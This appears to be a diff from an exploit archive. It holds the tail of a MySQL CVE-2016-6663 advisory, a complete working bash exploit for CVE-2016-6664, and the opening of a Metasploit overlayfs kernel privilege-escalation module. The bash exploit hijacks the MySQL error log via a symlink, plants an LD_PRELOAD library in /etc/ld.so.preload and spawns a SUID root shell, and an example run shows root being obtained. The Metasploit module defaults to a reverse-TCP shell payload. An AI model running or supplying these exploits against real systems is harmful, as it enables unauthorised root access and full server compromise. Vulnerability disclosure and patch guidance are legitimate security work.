-rwsrwxrwx 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD
[+] Spawning the mysql SUID shell now...
Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :)
mysql_suid_shell.MYD-4.3$ whoami
mysql
mysql_suid_shell.MYD-4.3$ id
uid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker)
mysql_suid_shell.MYD-4.3$ ls -l /var/lib/mysql/mysql/user.*
-rw-rw---- 1 mysql mysql 2879 Oct 29 14:23 /var/lib/mysql/mysql/user.frm
-rw-rw---- 1 mysql mysql 168 Oct 29 22:35 /var/lib/mysql/mysql/user.MYD
-rw-rw---- 1 mysql mysql 4096 Oct 30 00:11 /var/lib/mysql/mysql/user.MYI
mysql_suid_shell.MYD-4.3$ exit
exit
[+] Job done. Exiting
real 0m28.999s
user 0m0.016s
sys 0m0.016s
Video PoC:
~~~~~~~~~~~~
http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html
VI. BUSINESS IMPACT
-------------------------
Malicious local users with DB access granted a common set of privileges
(SELECT/INSERT/CREATE) could exploit this vulnerability to execute arbitrary
code and escalate their privileges to mysql system user. This would allow them
to gain access to all of the databases stored on the server as well as exploit
CVE-2016-6662 or CVE-2016-6664 vulnerabilities to further elevate privileges
to root system user (rootshell) and fully compromise the target server.
This vulnerability could for example be exploited by malicious users in a shared
hosting environment where each user is supposed to have access to only one
database assigned to them.
It could also be exploited by attackers who have managed to find a vulnerability
in a website and gained access to the target system as a low-privileged user
(such as apache/www-data).
VII. SYSTEMS AFFECTED
-------------------------
MariaDB
< 5.5.52
< 10.1.18
< 10.0.28
MySQL
<= 5.5.51
<= 5.6.32
<= 5.7.14
Percona Server
< 5.5.51-38.2
< 5.6.32-78-1
< 5.7.14-8
Percona XtraDB Cluster
< 5.6.32-25.17
< 5.7.14-26.17
< 5.5.41-37.0
When checking if your system contains the patches, note that this vulnerability
has been known under two CVE IDs:
CVE-2016-6663
CVE-2016-5616
CVE-2016-6663 is the original CVE that was agreed to be used by all the
affected vendors.
The issue was however mentioned in Oracle CPU mistakenly under a new CVE of
CVE-2016-5616, resulting in a duplicate. Oracle has informed that CPU will be
updated to state that CVE-2016-5616 is equivalent to CVE-2016-6663.
VIII. SOLUTION
-------------------------
MariaDB/MySQL/PerconaDB vendors have received a copy of this advisory in
advance which allowed them to produce patches for this vulnerability before
disclosure.
Update to security releases issued by the vendor.
As a temporary mitigation, you can disable symbolic link support in the
database server configuration with the following my.cnf config setting:
symbolic-links = 0
Nevertheless, an update to a patched release is recommended.
IX. REFERENCES
-------------------------
http://legalhackers.com
This advisory (CVE-2016-6663 / OCVE-2016-5616):
http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
Exploit (mysql-privesc-race.c) source code URL:
http://legalhackers.com/exploits/mysql-privesc-race.c
Video PoC:
http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html
Advisory for CVE-2016-6664 / OCVE-2016-5617:
http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html
Vendor updates:
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL
http://www.mysql.com/
https://mariadb.org/about/
https://mariadb.com/kb/en/mdb-5552-rn/
https://mariadb.com/kb/en/mdb-10118-rn/
https://mariadb.com/kb/en/mdb-10028-rn/
https://www.percona.com/software
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. REVISION HISTORY
-------------------------
01.11.2016 - Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.

206
platforms/linux/local/40679.sh Executable file
View file

@ -0,0 +1,206 @@
#!/bin/bash -p
#
# Source: https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html // http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh
#
# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit
# mysql-chowned.sh (ver. 1.0)
#
# CVE-2016-6664 / OCVE-2016-5617
#
# Discovered and coded by:
#
# Dawid Golunski
# dawid[at]legalhackers.com
#
# https://legalhackers.com
#
# Follow https://twitter.com/dawid_golunski for updates on this advisory.
#
# This PoC exploit allows attackers to (instantly) escalate their privileges
# from mysql system account to root through unsafe error log handling.
# The exploit requires that file-based logging has been configured (default).
# To confirm that syslog logging has not been enabled instead use:
# grep -r syslog /etc/mysql
# which should return no results.
#
# This exploit can be chained with the following vulnerability:
# CVE-2016-6663 / OCVE-2016-5616
# which allows attackers to gain access to mysql system account (mysql shell).
#
# In case database server has been configured with syslog you may also use:
# CVE-2016-6662 as an alternative to this exploit.
#
# Usage:
# ./mysql-chowned.sh path_to_error.log
#
#
# See the full advisory for details at:
# https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html
#
# Video PoC:
# https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html
#
#
# Disclaimer:
# For testing purposes only. Do no harm.
#
BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/mysqlrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"
function cleanexit {
# Cleanup
echo -e "\n[+] Cleaning up..."
rm -f $PRIVESCSRC
rm -f $PRIVESCLIB
rm -f $ERRORLOG
touch $ERRORLOG
if [ -f /etc/ld.so.preload ]; then
echo -n > /etc/ld.so.preload
fi
echo -e "\n[+] Job done. Exiting with code $1 \n"
exit $1
}
function ctrl_c() {
echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
cleanexit 0
}
#intro
echo -e "\033[94m \nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \nmysql-chowned.sh (ver. 1.0)\n\nCVE-2016-6664 / OCVE-2016-5617\n"
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"
# Args
if [ $# -lt 1 ]; then
echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n"
echo -e "It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n"
exit 3
fi
# Priv check
echo -e "\n[+] Starting the exploit as \n\033[94m`id`\033[0m"
id | grep -q mysql
if [ $? -ne 0 ]; then
echo -e "\n[!] You need to execute the exploit as mysql user! Exiting.\n"
exit 3
fi
# Set target paths
ERRORLOG="$1"
if [ ! -f $ERRORLOG ]; then
echo -e "\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\n"
exit 3
fi
echo -e "\n[+] Target MySQL log file set to $ERRORLOG"
# [ Active exploitation ]
trap ctrl_c INT
# Compile privesc preload library
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
cat <<_solibeof_>$PRIVESCSRC
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
uid_t geteuid(void) {
static uid_t (*old_geteuid)();
old_geteuid = dlsym(RTLD_NEXT, "geteuid");
if ( old_geteuid() == 0 ) {
chown("$BACKDOORPATH", 0, 0);
chmod("$BACKDOORPATH", 04777);
//unlink("/etc/ld.so.preload");
}
return old_geteuid();
}
_solibeof_
/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl"
if [ $? -ne 0 ]; then
echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
cleanexit 2;
fi
# Prepare backdoor shell
cp $BACKDOORSH $BACKDOORPATH
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"
# Safety check
if [ -f /etc/ld.so.preload ]; then
echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
exit 2
fi
# Symlink the log file to /etc
rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG
if [ $? -ne 0 ]; then
echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink."
cleanexit 3
fi
echo -e "\n[+] Symlink created at: \n`ls -l $ERRORLOG`"
# Wait for MySQL to re-open the logs
echo -ne "\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\n"
read -p "Do you want to kill mysqld process to instantly get root? :) ? [y/n] " THE_ANSWER
if [ "$THE_ANSWER" = "y" ]; then
echo -e "Got it. Executing 'killall mysqld' now..."
killall mysqld
fi
while :; do
sleep 0.1
if [ -f /etc/ld.so.preload ]; then
echo $PRIVESCLIB > /etc/ld.so.preload
rm -f $ERRORLOG
break;
fi
done
# /etc/ dir should be owned by mysql user at this point
# Inject the privesc.so shared library to escalate privileges
echo $PRIVESCLIB > /etc/ld.so.preload
echo -e "\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \n`ls -l /etc/ld.so.preload`"
echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"
chmod 755 /etc/ld.so.preload
# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
sudo 2>/dev/null >/dev/null
#while :; do
# sleep 0.1
# ps aux | grep mysqld | grep -q 'log-error'
# if [ $? -eq 0 ]; then
# break;
# fi
#done
# Check for the rootshell
ls -l $BACKDOORPATH
ls -l $BACKDOORPATH | grep rws | grep -q root
if [ $? -eq 0 ]; then
echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
echo -e "\n\033[94mGot root! The database server has been ch-OWNED !\033[0m"
else
echo -e "\n[!] Failed to get root"
cleanexit 2
fi
# Execute the rootshell
echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n"
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
$BACKDOORPATH -p
# Job done.
cleanexit 0

531
platforms/linux/local/40679.txt
View file

@ -1,531 +0,0 @@
=============================================
- Release date: 01.11.2016
- Discovered by: Dawid Golunski
- Severity: High
- CVE-2016-6664 / OCVE-2016-5617
- http://legalhackers.com
=============================================
I. VULNERABILITY
-------------------------
MariaDB / MySQL / PerconaDB - Root Privilege Escalation
MySQL
<= 5.5.51
<= 5.6.32
<= 5.7.14
MariaDB
All current
Percona Server
< 5.5.51-38.2
< 5.6.32-78-1
< 5.7.14-8
Percona XtraDB Cluster
< 5.6.32-25.17
< 5.7.14-26.17
< 5.5.41-37.0
II. BACKGROUND
-------------------------
MySQL:
"MySQL is the world's most popular open source database.
Whether you are a fast growing web property, technology ISV or large
enterprise, MySQL can cost-effectively help you deliver high performance,
scalable database applications."
"Many of the world's largest and fastest-growing organizations including
Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time
and money powering their high-volume Web sites, business-critical systems and
packaged software."
http://www.mysql.com/products/
http://www.mysql.com/why-mysql/
--
MariaDB:
"MariaDB is one of the most popular database servers in the world.
It’s made by the original developers of MySQL and guaranteed to stay open source.
Notable users include Wikipedia, WordPress.com and Google.
MariaDB turns data into structured information in a wide array of applications,
ranging from banking to websites. It is an enhanced, drop-in replacement for MySQL.
MariaDB is used because it is fast, scalable and robust, with a rich ecosystem of
storage engines, plugins and many other tools make it very versatile for a wide
variety of use cases."
https://mariadb.org/about/
--
PerconaDB:
"Percona Server for MySQL is a free, fully compatible, enhanced, open source
drop-in replacement for MySQL that provides superior performance, scalability
and instrumentation.
With over 3,000,000 downloads, Percona Server’s self-tuning algorithms and support
for extremely high-performance hardware delivers excellent performance and reliability."
https://www.percona.com/software/mysql-database/percona-server
III. INTRODUCTION
-------------------------
MySQL-based databases including MySQL, MariaDB and PerconaDB are affected
by a privilege escalation vulnerability which can let attackers who have
gained access to mysql system user to further escalate their privileges
to root user allowing them to fully compromise the system.
The vulnerability stems from unsafe file handling of error logs and
other files.
IV. DESCRIPTION
-------------------------
The error.log file on most default installations of MySQL/PerconaDB/MariaDB
databases is stored either in /var/log/mysql or /var/lib/mysql directory.
The permissions on the file and directory look as follows:
root@trusty:/var/lib/mysql# ls -la /var/log/mysql
total 468
drwxr-s--- 2 mysql adm 4096 Sep 11 06:25 .
drwxrwxr-x 36 root syslog 4096 Sep 11 06:25 ..
-rw-r----- 1 mysql adm 0 Sep 11 06:25 error.log
root@trusty:/var/lib/mysql# ls -lad /var/log/mysql
drwxr-s--- 2 mysql adm 4096 Sep 11 06:25 /var/log/mysql
mysqld_safe wrapper that is normally used for starting MySQL daemon and
creating/reopening the error.log performs certain unsafe file operations that
may allow attackers to gain root privileges.
The wrapper script contains a 'while' loop shown below which monitors the mysqld
process and performs a restart in case of the process failure.
The restart involves re-creation of the error.log file if syslog logging has
not been configured instead of error log files (file-based logging is the
default setting on most installations).
--------[ mysqld_safe ]--------
[...]
while true
do
rm -f "$pid_file" # Some extra safety
start_time=`date +%M%S`
eval_log_error "$cmd"
if [ $want_syslog -eq 0 -a ! -f "$err_log" ]; then
touch "$err_log" # hypothetical: log was renamed but not
chown $user "$err_log" # flushed yet. we'd recreate it with
chmod "$fmode" "$err_log" # wrong owner next time we log, so set
fi # it up correctly while we can!
[...]
-------------------------------
As can be seen, the error.log file is created (touch) and chowned to the user
running the mysqld daemon (typically 'mysql').
The operation is vulnerable to a symlink attack.
Attackers who obtained access to mysql account for example through CVE-2016-6663
vulnerability described at:
http://legalhackers.com/advisories/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-OCVE-2016-5616-Exploit.html
would gain access to /var/log or /var/lib/mysql directories (owned by mysql user)
and could therefore easily remove the error.log file and replace it
with a symlink to an arbitrary system file which would result in creating in
arbitrary file on the system with mysql privileges and could be used to escalate
privileges.
The privilege escalation could be triggered instantly (without the need to wait
for mysql service restart/reboot) by attackers having 'mysql' account by simply
killing the mysqld child process (launched by the mysqld_safe wrapper).
When the mysqld process gets terminated, the wrapper will then re-itertate the
loop shown above and immediately create a mysql-owned file in the location
specified by the attacker in the symlink thus allowing attackers to quickly
escalate their privileges.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
-------[ mysql-chowned.sh ]------
#!/bin/bash -p
#
# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit
# mysql-chowned.sh (ver. 1.0)
#
# CVE-2016-6664 / OCVE-2016-5617
#
# Discovered and coded by:
#
# Dawid Golunski
# dawid[at]legalhackers.com
#
# http://legalhackers.com
#
#
# This PoC exploit allows attackers to (instantly) escalate their privileges
# from mysql system account to root through unsafe error log handling.
# The exploit requires that file-based logging has been configured (default).
# To confirm that syslog logging has not been enabled instead use:
# grep -r syslog /etc/mysql
# which should return no results.
#
# This exploit can be chained with the following vulnerability:
# CVE-2016-6663 / OCVE-2016-5616
# which allows attackers to gain access to mysql system account (mysql shell).
#
# In case database server has been configured with syslog you may also use:
# CVE-2016-6662 as an alternative to this exploit.
#
# Usage:
# ./mysql-chowned.sh path_to_error.log
#
# See full advisory for details at:
#
# http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html
#
# Disclaimer:
# For testing purposes only. Do no harm.
#
BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/mysqlrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"
function cleanexit {
# Cleanup
echo -e "\n[+] Cleaning up..."
rm -f $PRIVESCSRC
rm -f $PRIVESCLIB
rm -f $ERRORLOG
touch $ERRORLOG
if [ -f /etc/ld.so.preload ]; then
echo -n > /etc/ld.so.preload
fi
echo -e "\n[+] Job done. Exiting with code $1 \n"
exit $1
}
function ctrl_c() {
echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
cleanexit 0
}
#intro
echo -e "\033[94m \nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \nmysql-chowned.sh (ver. 1.0)\n\nCVE-2016-6664 / OCVE-2016-5617\n"
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"
# Args
if [ $# -lt 1 ]; then
echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n"
echo -e "It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n"
exit 3
fi
# Priv check
echo -e "\n[+] Starting the exploit as \n\033[94m`id`\033[0m"
id | grep -q mysql
if [ $? -ne 0 ]; then
echo -e "\n[!] You need to execute the exploit as mysql user! Exiting.\n"
exit 3
fi
# Set target paths
ERRORLOG="$1"
if [ ! -f $ERRORLOG ]; then
echo -e "\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\n"
exit 3
fi
echo -e "\n[+] Target MySQL log file set to $ERRORLOG"
# [ Active exploitation ]
trap ctrl_c INT
# Compile privesc preload library
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
cat <<_solibeof_>$PRIVESCSRC
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
uid_t geteuid(void) {
static uid_t (*old_geteuid)();
old_geteuid = dlsym(RTLD_NEXT, "geteuid");
if ( old_geteuid() == 0 ) {
chown("$BACKDOORPATH", 0, 0);
chmod("$BACKDOORPATH", 04777);
//unlink("/etc/ld.so.preload");
}
return old_geteuid();
}
_solibeof_
/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl"
if [ $? -ne 0 ]; then
echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
cleanexit 2;
fi
# Prepare backdoor shell
cp $BACKDOORSH $BACKDOORPATH
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"
# Safety check
if [ -f /etc/ld.so.preload ]; then
echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
exit 2
fi
# Symlink the log file to /etc
rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG
if [ $? -ne 0 ]; then
echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink."
cleanexit 3
fi
echo -e "\n[+] Symlink created at: \n`ls -l $ERRORLOG`"
# Wait for MySQL to re-open the logs
echo -ne "\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\n"
read -p "Do you want to kill mysqld process to instantly get root? :) ? [y/n] " THE_ANSWER
if [ "$THE_ANSWER" = "y" ]; then
echo -e "Got it. Executing 'killall mysqld' now..."
killall mysqld
fi
while :; do
sleep 0.1
if [ -f /etc/ld.so.preload ]; then
echo $PRIVESCLIB > /etc/ld.so.preload
rm -f $ERRORLOG
break;
fi
done
# /etc/ dir should be owned by mysql user at this point
# Inject the privesc.so shared library to escalate privileges
echo $PRIVESCLIB > /etc/ld.so.preload
echo -e "\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \n`ls -l /etc/ld.so.preload`"
echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"
chmod 755 /etc/ld.so.preload
# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
sudo 2>/dev/null >/dev/null
#while :; do
# sleep 0.1
# ps aux | grep mysqld | grep -q 'log-error'
# if [ $? -eq 0 ]; then
# break;
# fi
#done
# Check for the rootshell
ls -l $BACKDOORPATH
ls -l $BACKDOORPATH | grep rws | grep -q root
if [ $? -eq 0 ]; then
echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
echo -e "\n\033[94mGot root! The database server has been ch-OWNED !\033[0m"
else
echo -e "\n[!] Failed to get root"
cleanexit 2
fi
# Execute the rootshell
echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n"
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
$BACKDOORPATH -p
# Job done.
cleanexit 0
------------EOF------------------
Example run
~~~~~~~~~~~~~~~~
mysql_suid_shell.MYD-4.3$ whoami
mysql
omysql_suid_shell.MYD-4.3$ dpkg -l | grep percona-server-server
iU percona-server-server 5.6.32-78.0-1.xenial amd64 Percona Server database server
iF percona-server-server-5.6 5.6.32-78.0-1.xenial amd64 Percona Server database server binaries
mysql_suid_shell.MYD-4.3$ ./mysql-chowned.sh /var/lib/mysql/xenial-percona.err
MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit
mysql-chowned.sh (ver. 1.0)
CVE-2016-6664 / OCVE-2016-5617
Discovered and coded by:
Dawid Golunski
http://legalhackers.com
[+] Starting the exploit as
uid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker)
[+] Target MySQL log file set to /var/lib/mysql/xenial-percona.err
[+] Compiling the privesc shared library (/tmp/privesclib.c)
[+] Backdoor/low-priv shell installed at:
-rwxr-xr-x 1 mysql attacker 1037528 Nov 1 05:08 /tmp/mysqlrootsh
[+] Symlink created at:
lrwxrwxrwx 1 mysql attacker 18 Nov 1 05:08 /var/lib/mysql/xenial-percona.err -> /etc/ld.so.preload
[+] Waiting for MySQL to re-open the logs/MySQL service restart...
Do you want to kill mysqld process to instantly get root? :) ? [y/n] y
Got it. Executing 'killall mysqld' now...
[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges:
-rw-r----- 1 mysql root 19 Nov 1 05:08 /etc/ld.so.preload
[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload
[+] The /etc/ld.so.preload file now contains:
/tmp/privesclib.so
[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!
-rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh
[+] Rootshell got assigned root SUID perms at:
-rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh
Got root! The database server has been ch-OWNED !
[+] Spawning the rootshell /tmp/mysqlrootsh now!
mysqlrootsh-4.3# whoami
root
mysqlrootsh-4.3# exit
exit
[+] Cleaning up...
[+] Job done. Exiting with code 0
Video PoC:
~~~~~~~~~~~~~
http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html
VI. BUSINESS IMPACT
-------------------------
Attackers who obtained mysql account through other vulnerabilities
(such as CVE-2016-6663) could use this exploit to gain root access
and fully compromise the system.
VII. SYSTEMS AFFECTED
-------------------------
MySQL
<= 5.5.51
<= 5.6.32
<= 5.7.14
MariaDB
All current
Percona Server
< 5.5.51-38.2
< 5.6.32-78-1
< 5.7.14-8
Percona XtraDB Cluster
< 5.6.32-25.17
< 5.7.14-26.17
< 5.5.41-37.0
VIII. SOLUTION
-------------------------
Vendors have released patches after private disclosure.
Update to the latest version of your DBMS.
IX. REFERENCES
-------------------------
http://legalhackers.com
This advisory:
http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html
Exploit source code:
http://legalhackers.com/exploits/mysql-chowned.sh
CVE-2016-6663 vulnerability which can allow attackers to obtain 'mysql' system account:
http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
Video PoC:
http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html
CVE-2016-6664
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6664
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. REVISION HISTORY
-------------------------
01.11.2016 - Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.

293
platforms/linux/local/40688.rb Executable file
View file

@ -0,0 +1,293 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require "msf/core"
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Overlayfs Privilege Escalation',
'Description' => %q{
This module attempts to exploit two different CVEs related to overlayfs.
CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55
3.16.0-25 (14.10 default) < 3.16.0-41
3.19.0-18 (15.04 default) < 3.19.0-21
CVE-2015-8660:
Ubuntu:
3.19.0-18 < 3.19.0-43
4.2.0-18 < 4.2.0-23 (14.04.1, 15.10)
Fedora:
< 4.2.8 (vulnerable, un-tested)
Red Hat:
< 3.10.0-327 (rhel 6, vulnerable, un-tested)
},
'License' => MSF_LICENSE,
'Author' =>
[
'h00die <mike@shorebreaksecurity.com>', # Module
'rebel' # Discovery
],
'DisclosureDate' => 'Jun 16 2015',
'Platform' => [ 'linux'],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' =>
[
[ 'CVE-2015-1328', { } ],
[ 'CVE-2015-8660', { } ]
],
'DefaultTarget' => 1,
'DefaultOptions' =>
{
'payload' => 'linux/x86/shell/reverse_tcp' # for compatibility due to the need on cve-2015-1328 to run /bin/su
},
'References' =>
[
[ 'EDB', '39166'], # CVE-2015-8660
[ 'EDB', '37292'], # CVE-2015-1328
[ 'CVE', '2015-1328'],
[ 'CVE', '2015-8660']
]
))
register_options(
[
OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
], self.class)
end
def check
def mounts_exist?()
vprint_status('Checking if mount points exist')
if target.name == 'CVE-2015-1328'
if not directory?('/tmp/ns_sploit')
vprint_good('/tmp/ns_sploit not created')
return true
else
print_error('/tmp/ns_sploit directory exists. Please delete.')
return false
end
elsif target.name == 'CVE-2015-8660'
if not directory?('/tmp/haxhax')
vprint_good('/tmp/haxhax not created')
return true
else
print_error('/tmp/haxhax directory exists. Please delete.')
return false
end
end
end
def kernel_vuln?()
os_id = cmd_exec('grep ^ID= /etc/os-release')
case os_id
when 'ID=ubuntu'
kernel = Gem::Version.new(cmd_exec('/bin/uname -r'))
case kernel.release.to_s
when '3.13.0'
if kernel.between?(Gem::Version.new('3.13.0-24-generic'),Gem::Version.new('3.13.0-54-generic'))
vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328")
return true
else
print_error("Kernel #{kernel} is NOT vulnerable")
return false
end
when '3.16.0'
if kernel.between?(Gem::Version.new('3.16.0-25-generic'),Gem::Version.new('3.16.0-40-generic'))
vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328")
return true
else
print_error("Kernel #{kernel} is NOT vulnerable")
return false
end
when '3.19.0'
if kernel.between?(Gem::Version.new('3.19.0-18-generic'),Gem::Version.new('3.19.0-20-generic'))
vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328")
return true
elsif kernel.between?(Gem::Version.new('3.19.0-18-generic'),Gem::Version.new('3.19.0-42-generic'))
vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660")
return true
else
print_error("Kernel #{kernel} is NOT vulnerable")
return false
end
when '4.2.0'
if kernel.between?(Gem::Version.new('4.2.0-18-generic'),Gem::Version.new('4.2.0-22-generic'))
vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660")
return true
else
print_error("Kernel #{kernel} is NOT vulnerable")
return false
end
else
print_error("Non-vuln kernel #{kernel}")
return false
end
when 'ID=fedora'
kernel = Gem::Version.new(cmd_exec('/usr/bin/uname -r').sub(/\.fc.*/, '')) # we need to remove the trailer after .fc
# irb(main):008:0> '4.0.4-301.fc22.x86_64'.sub(/\.fc.*/, '')
# => "4.0.4-301"
if kernel.release < Gem::Version.new('4.2.8')
vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660. Exploitation UNTESTED")
return true
else
print_error("Non-vuln kernel #{kernel}")
return false
end
else
print_error("Unknown OS: #{os_id}")
return false
end
end
if mounts_exist?() && kernel_vuln?()
return CheckCode::Appears
else
return CheckCode::Safe
end
end
def exploit
if check != CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
end
filename = rand_text_alphanumeric(8)
executable_path = "#{datastore['WritableDir']}/#{filename}"
payloadname = rand_text_alphanumeric(8)
payload_path = "#{datastore['WritableDir']}/#{payloadname}"
def has_prereqs?()
gcc = cmd_exec('which gcc')
if gcc.include?('gcc')
vprint_good('gcc is installed')
else
print_error('gcc is not installed. Compiling will fail.')
end
return gcc.include?('gcc')
end
compile = false
if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'
if has_prereqs?()
compile = true
vprint_status('Live compiling exploit on system')
else
vprint_status('Dropping pre-compiled exploit on system')
end
end
